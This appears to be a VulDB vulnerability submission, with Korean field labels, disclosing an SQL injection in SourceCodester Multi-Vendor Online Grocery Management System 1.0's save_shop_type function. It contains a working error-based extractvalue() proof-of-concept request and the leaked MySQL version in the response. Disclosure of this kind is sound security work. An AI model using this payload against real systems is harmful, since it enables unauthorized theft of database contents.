| 제목 | SourceCodester Multi-Vendor Online Grocery Management System 1.0 SQL Injection |
|---|
| 설명 | A vulnerability was found in SourceCodester Multi-Vendor Online Grocery Management System 1.0. It has been declared as
critical. The save_shop_type() function in classes/Master.php concatenates the unsanitized id POST parameter into a
SQL query. The capture_err() function returns the raw MySQL error string in the JSON response. Using extractvalue()
payloads, an attacker can extract arbitrary database contents from the HTTP response.
POST /mvogms/classes/Master.php?f=save_shop_type
name=x&id=1 AND extractvalue(1,concat(0x7e,(SELECT version()),0x7e))
Response: {"error":"XPATH syntax error: '~5.7.26~'"} |
|---|
| 원천 | ⚠️ https://github.com/lee945/cve/issues/3 |
|---|
| 사용자 | cHr1s (UID 98736) |
|---|
| 제출 | 2026. 06. 03. PM 01:55 (1 월 ago) |
|---|
| 모더레이션 | 2026. 07. 04. AM 06:59 (1 month later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 376288 [SourceCodester Multi-Vendor Online Grocery Management System 1.0/5.7.26 POST Parameter classes/Master.php save_shop_type SQL 주입] |
|---|
| 포인트들 | 20 |
|---|